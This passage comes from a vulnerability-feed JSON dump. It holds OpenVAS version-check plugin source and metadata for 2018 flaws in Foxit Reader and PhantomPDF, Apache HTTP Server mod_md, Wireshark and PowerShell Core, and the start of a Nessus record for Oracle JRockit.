"cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-07-20T19:27:53", "id": "TALOSBLOG:0C6D0BEB8A491B6706BB6F208E636EBD", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/z-1wHMb8olI/threat-roundup-0713-0720.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-07-20T19:43:13", "references": ["https://www.foxitsoftware.com/support/security-bulletins.php#content-2018", "http://www.foxitsoftware.com"], "pluginID": "1361412562310813263", "description": "The host is installed with Foxit Reader and\n is prone to multiple code execution vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Foxit Reader 'JavaScript' Remote Code Execution Vulnerabilities (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:43:13", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3939", "CVE-2018-3924"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813263", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_foxit_reader_javascript_rce_vuln_win.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Foxit Reader 'JavaScript' Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation;\n# either version 2 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813263\");\n script_version(\"$Revision: 10558 $\");\n script_cve_id(\"CVE-2018-3924\", \"CVE-2018-3939\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 15:00:12 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Foxit Reader 'JavaScript' Remote Code Execution Vulnerabilities (Windows)\");\n\n script_tag(name: \"summary\" , value:\"The host is installed with Foxit Reader and\n is prone to multiple code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help\n of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws exists due to,\n\n - The user-after-free vulnerability that exists in the JavaScript, When\n executing embedded JavaScript code a document can be cloned. which frees\n a lot of used objects, but the JavaScript can continue to execute.\n\n - The use-after-free vulnerability found in the Javascript engine that can\n result in remote code execution.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow an\n attacker to execute arbitrary code.\n\n Impact Level: System/Application\");\n\n script_tag(name: \"affected\" , value:\"Foxit Reader versions before 9.2 on Windows.\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Foxit Reader version 9.2\n or later. For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name : \"URL\" , value:\"http://www.foxitsoftware.com\");\n script_xref(name : \"URL\" , value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_reader_detect_portable_win.nasl\");\n script_mandatory_keys(\"Foxit/Reader/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\nif(version_is_less(version:pdfVer, test_version:\"9.2\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"9.2\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:43:13", "references": ["https://www.foxitsoftware.com/support/security-bulletins.php#content-2018", "http://www.foxitsoftware.com"], "pluginID": "1361412562310813264", "description": "The host is installed with Foxit PhantomPDF\n and is prone to multiple code execution vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Foxit PhantomPDF 'JavaScript' Remote Code Execution Vulnerabilities (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:43:13", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3939", "CVE-2018-3924"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813264", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813264", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_foxit_phantompdf_javascript_rce_vuln_win.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Foxit PhantomPDF 'JavaScript' Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation;\n# either version 2 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:phantompdf\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813264\");\n script_version(\"$Revision: 10558 $\");\n script_cve_id(\"CVE-2018-3924\", \"CVE-2018-3939\"); \n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 15:00:12 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Foxit PhantomPDF 'JavaScript' Remote Code Execution Vulnerabilities (Windows)\");\n\n script_tag(name: \"summary\" , value:\"The host is installed with Foxit PhantomPDF\n and is prone to multiple code execution vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Get the installed version with the help\n of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws exists due to,\n\n - The user-after-free vulnerability that exists in the JavaScript, When\n executing embedded JavaScript code a document can be cloned. which frees\n a lot of used objects, but the JavaScript can continue to execute.\n\n - The use-after-free vulnerability found in the Javascript engine that can\n result in remote code execution.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow an\n attacker to execute arbitrary code.\n\n Impact Level: System/Application\");\n\n script_tag(name: \"affected\" , value:\"Foxit PhantomPDF versions before 9.2 on Windows.\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Foxit PhantomPDF version 9.2\n or later. For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name : \"URL\" , value:\"http://www.foxitsoftware.com\");\n script_xref(name : \"URL\" , value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_phantom_reader_detect.nasl\");\n script_mandatory_keys(\"Foxit/PhantomPDF/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\nif(version_is_less(version:pdfVer, test_version:\"9.2\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"9.2\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:46:00", "references": ["http://seclists.org/oss-sec/2018/q3/40", "https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2018-8011"], "pluginID": "1361412562310813265", "description": "The host is installed with Apache HTTP server\n and is prone to denial of service vulnerability.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Apache HTTP Server 'mod_md' Denial of Service Vulnerability (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:46:00", "vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8011"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_httpd_mod_md_challenge_handler_dos_vuln_win.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Apache HTTP Server 'mod_md' Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details. \n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n############################################################################### \n\nCPE = \"cpe:/a:apache:http_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813265\");\n script_version(\"$Revision: 10558 $\");\n script_cve_id(\"CVE-2018-8011\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 15:20:23 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Apache HTTP Server 'mod_md' Denial of Service Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Apache HTTP server\n and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help\n of the detect NVT and check if the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in 'mod_md'\n challenge handler.Which is not properly handling the specially crafting HTTP\n requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash the Apache HTTP Server and perform denial of service attack.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP server version 2.4.33 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 2.4.34 or later.\n For updates refer to Reference links.\");\n \n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2018/q3/40\");\n script_xref(name:\"URL\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2018-8011\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"Host/runs_windows\", \"apache/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!hport = get_app_port(cpe: CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:hport, exit_no_version:TRUE)) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(vers == \"2.4.33\")\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.4.34\" , install_path:path);\n security_message(port:hport, data:report);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:43:25", "references": ["https://www.wireshark.org", "https://www.wireshark.org/security/wnpa-sec-2018-38", "https://www.wireshark.org/security/wnpa-sec-2018-36", "https://www.wireshark.org/security/wnpa-sec-2018-34", "https://www.wireshark.org/security/wnpa-sec-2018-40", "https://www.wireshark.org/security/wnpa-sec-2018-37", "https://www.wireshark.org/security/wnpa-sec-2018-41", "https://www.wireshark.org/security/wnpa-sec-2018-35", "https://www.wireshark.org/security/wnpa-sec-2018-39"], "pluginID": "1361412562310813586", "description": "This host is installed with Wireshark\n and is prone to multiple vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Wireshark Security Updates (wnpa-sec-2018-34_wnpa-sec-2018-41) Windows", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:43:25", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14339", "CVE-2018-14343", "CVE-2018-14341", "CVE-2018-14344", "CVE-2018-14369", "CVE-2018-14342", "CVE-2018-14368", "CVE-2018-14340"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813586", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_wnpa-sec-2018-34_wnpa-sec-2018-41_win.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Wireshark Security Updates (wnpa-sec-2018-34_wnpa-sec-2018-41) Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wireshark:wireshark\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813586\");\n script_version(\"$Revision: 10558 $\");\n script_cve_id(\"CVE-2018-14339\", \"CVE-2018-14344\", \"CVE-2018-14343\", \"CVE-2018-14342\", \n \"CVE-2018-14341\", \"CVE-2018-14340\", \"CVE-2018-14369\", \"CVE-2018-14368\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 10:41:30 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Wireshark Security Updates (wnpa-sec-2018-34_wnpa-sec-2018-41) Windows\");\n\n script_tag(name: \"summary\" , value:\"This host is installed with Wireshark\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value: \"Get the installed version with the\n help of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws exists due to an,\n\n - Improperly sanitized MMSE dissector.\n\n - Improperly sanitized ISMP dissector.\n\n - Improperly sanitized ASN.1 BER dissector.\n\n - Improperly sanitized BGP dissector.\n\n - Improperly sanitized DICOM dissector.\n\n - Improperly sanitized dissectors that support zlib decompression.\n\n - Improperly sanitized HTTP2 protocol dissector.\n\n - Improperly sanitized Bazaar protocol dissector.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote\n attackers to inject a malformed packet causing excessive CPU resources\n consumption and denial of service.\n\n Impact Level: Application.\");\n\n script_tag(name: \"affected\" , value: \"Wireshark version 2.6.0 to 2.6.1, 2.4.0 to\n 2.4.7, 2.2.0 to 2.2.15 on Windows.\");\n\n script_tag(name: \"solution\" , value: \"Upgrade to Wireshark version 2.6.2, 2.4.8, 2.2.16\n For updates refer to Reference links.\");\n\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-38\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-35\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-37\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-34\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-39\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-36\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-41\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-40\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org\"); \n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nwirversion = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:wirversion, test_version:\"2.6.0\", test_version2:\"2.6.1\")){\n fix = \"2.6.2\";\n}\n\nelse if(version_in_range(version:wirversion, test_version:\"2.4.0\", test_version2:\"2.4.7\")){\n fix = \"2.4.8\";\n}\n\nelse if(version_in_range(version:wirversion, test_version:\"2.2.0\", test_version2:\"2.2.15\")){\n fix = \"2.2.16\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:wirversion, fixed_version:fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:43:46", "references": ["https://github.com/PowerShell/Announcements/issues/6", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8356", "https://github.com/PowerShell/PowerShell"], "pluginID": "1361412562310813697", "description": "This host is missing an important security\n update for PowerShell Core according to Microsoft security advisory\n CVE-2018-8356.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Microsoft PowerShell Core Security Feature Bypass Vulnerability July18 (Windows)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:43:46", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8356"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813697", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813697", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_powershell_sec_bypass_vuln_july18_win.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Microsoft PowerShell Core Security Feature Bypass Vulnerability July18 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:powershell\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813697\");\n script_version(\"$Revision: 10558 $\");\n script_cve_id(\"CVE-2018-8356\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 11:03:48 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Microsoft PowerShell Core Security Feature Bypass Vulnerability July18 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update for PowerShell Core according to Microsoft security advisory\n CVE-2018-8356.\");\n\n script_tag(name:\"vuldetect\", value:\"Get the installed version with the help\n of detect nvt and check the version is vulnerable or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when Microsoft .NET Framework \n components do not correctly validate certificates.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers \n to present expired certificates when challenged.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"PowerShell Core versions 6.x prior to 6.0.3 \n and 6.1.x prior to 6.1.0-preview.4 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Update PowerShell Core to version 6.0.3 or \n 6.1.0-preview.4 or later. For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name : \"URL\" , value : \"https://github.com/PowerShell/PowerShell\");\n script_xref(name : \"URL\" , value : \"https://github.com/PowerShell/Announcements/issues/6\");\n script_xref(name : \"URL\" , value : \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8356\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_powershell_core_detect_win.nasl\");\n script_mandatory_keys(\"PowerShell/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npsVer = infos['version'];\npsPath = infos['location'];\n\nif(version_in_range(version:psVer, test_version:\"6.0\", test_version2:\"6.0.2\")){\n fix = \"6.0.3\";\n}\n\nelse if(version_in_range(version:psVer, test_version:\"6.1\", test_version2:\"6.1.0.3\")){\n fix = \"6.1.0-preview.4\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:psVer, fixed_version:fix, install_path:psPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-20T19:43:25", "references": ["https://www.wireshark.org", "https://www.wireshark.org/security/wnpa-sec-2018-43", "https://www.wireshark.org/security/wnpa-sec-2018-42"], "pluginID": "1361412562310813588", "description": "This host is installed with Wireshark\n and is prone to multiple vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "Wireshark Security Updates (wnpa-sec-2018-42_wnpa-sec-2018-43) Windows", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:43:25", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14367", "CVE-2018-14370"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310813588", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813588", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_wnpa-sec-2018-42_wnpa-sec-2018-43_win.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# Wireshark Security Updates (wnpa-sec-2018-42_wnpa-sec-2018-43) Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wireshark:wireshark\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813588\");\n script_version(\"$Revision: 10558 $\");\n script_cve_id(\"CVE-2018-14367\", \"CVE-2018-14370\" );\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 10:41:45 +0530 (Fri, 20 Jul 2018)\");\n script_name(\"Wireshark Security Updates (wnpa-sec-2018-42_wnpa-sec-2018-43) Windows\");\n\n script_tag(name: \"summary\" , value:\"This host is installed with Wireshark\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value: \"Get the installed version with the\n help of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws exists due to an,\n\n - Improperly sanitized CoAP protocol dissector. \n\n - Improperly sanitized IEEE 802.11 protocol dissector.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote\n attackers to inject a malformed packet causing denial of service. \n\n Impact Level: Application.\");\n\n script_tag(name: \"affected\" , value: \"Wireshark version 2.6.0 to 2.6.1, 2.4.0\n to 2.4.7 on Windows.\");\n\n script_tag(name: \"solution\" , value: \"Upgrade to Wireshark version 2.6.2, 2.4.8\n For updates refer to Reference links.\");\n\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-42\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org/security/wnpa-sec-2018-43\");\n script_xref(name : \"URL\" , value : \"https://www.wireshark.org\"); \n \n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0); \nwirversion = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:wirversion, test_version:\"2.6.0\", test_version2:\"2.6.1\")){\n fix = \"2.6.2\";\n}\n\nelse if(version_in_range(version:wirversion, test_version:\"2.4.0\", test_version2:\"2.4.7\")){\n fix = \"2.4.8\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:wirversion, fixed_version:fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-07-21T11:44:00", "references": ["http://www.nessus.org/u?50f36723"], "pluginID": "111214", "description": "The version of Oracle JRockit installed on the remote Windows host is R28.3.18. It is, therefore, affected by multiple vulnerabilities.\nSee advisory for details.", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "Oracle JRockit R28.3.18 Multiple Vulnerabilities (July 2018 CPU)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T11:44:00", "vector": "NONE", "value": 5.0}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2938", "CVE-2018-2973", "CVE-2018-2942", "CVE-2018-2964", "CVE-2018-2972", "CVE-2018-2941", "CVE-2018-2940", "CVE-2018-2952"], 